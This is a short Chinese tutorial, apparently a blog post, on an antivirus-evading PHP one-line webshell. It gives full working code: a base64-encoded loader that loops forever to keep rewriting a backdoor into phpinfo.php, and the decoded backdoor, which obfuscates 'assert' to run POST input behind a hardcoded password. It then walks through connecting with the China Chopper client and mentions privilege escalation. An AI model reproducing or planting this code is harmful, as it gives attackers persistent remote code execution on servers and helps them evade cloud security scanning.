题记
天下古今之庸人,皆以一惰字致败;天下古今之才人,皆以一傲字致败。 ------曾国藩
概述
免杀一句话
我在自己的阿里云服务器上做了实验,正常的一句话阿里云会有警告,而这个木马成功骗过了阿里云。木马放在服务器php文件夹下的miansha.php中。
<?php set_time_limit(1); ignore_user_abort(true); $file = \'phpinfo.php\'; $shell = "PD9waHAKCSRzdHIxID0gJ2FIKFVVSChmc2RmSChVVUgoZnNkZixmZGdkZWZqZzBKKXImJUYlKl5HKnQnOwoJJHN0cjIgPSBzdHJ0cigkc3RyMSxhcnJheSgnYUgoVVVIKGZzZGZIKFVVSChmc2RmLCc9PidhcycsJ2ZkZ2RlZmpnMEopJz0+J3NlJywnciYlRiUqXkcqdCc9PidydCcpKTsKCSRzdHIzID0gc3RydHIoJHN0cjIsYXJyYXkoJ3MsJz0+J3MnLCdmZGdkZWZqZzBKKXImJUYlKl5HKic9PidlcicpKTsKCWlmKG1kNShAJF9HRVRbJ2EnXSkgPT0nZTEwYWRjMzk0OWJhNTlhYmJlNTZlMDU3ZjIwZjg4M2UnKXsKCQkkc3RyNCA9IHN0cnJldigkX1BPU1RbJ2EnXSk7CgkJJHN0cjUgPSBzdHJyZXYoJHN0cjQpOwoJCSRzdHIzKCRzdHI1KTsKICAgIH0KPz4="; while(true){ file_put_contents($file,base64_decode($shell)); usleep(50); } ?>
首先访问ip/php/miansha.php
结果会返回一个错误,但是会在php文件夹下生成一个phpinfo.php文件。
生成的phpinfo.php文件中代码为
<?php $str1 = \'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t\'; $str2 = strtr($str1,array(\'aH(UUH(fsdfH(UUH(fsdf,\'=>\'as\',\'fdgdefjg0J)\'=>\'se\',\'r&%F%*^G*t\'=>\'rt\')); $str3 = strtr($str2,array(\'s,\'=>\'s\',\'fdgdefjg0J)r&%F%*^G*\'=>\'er\')); if(md5(@$_GET[\'a\']) ==\'e10adc3949ba59abbe56e057f20f883e\'){ $str4 = strrev($_POST[\'a\']); $str5 = strrev($str4); $str3($str5); } ?>
e10adc3949ba59abbe56e057f20f883e的md5解密为123456
一句话木马利用
打开菜刀,输入连接url与密码。发现成功连接。
但是可能是阿里云的机制,不能在命令行操作,只能提权了。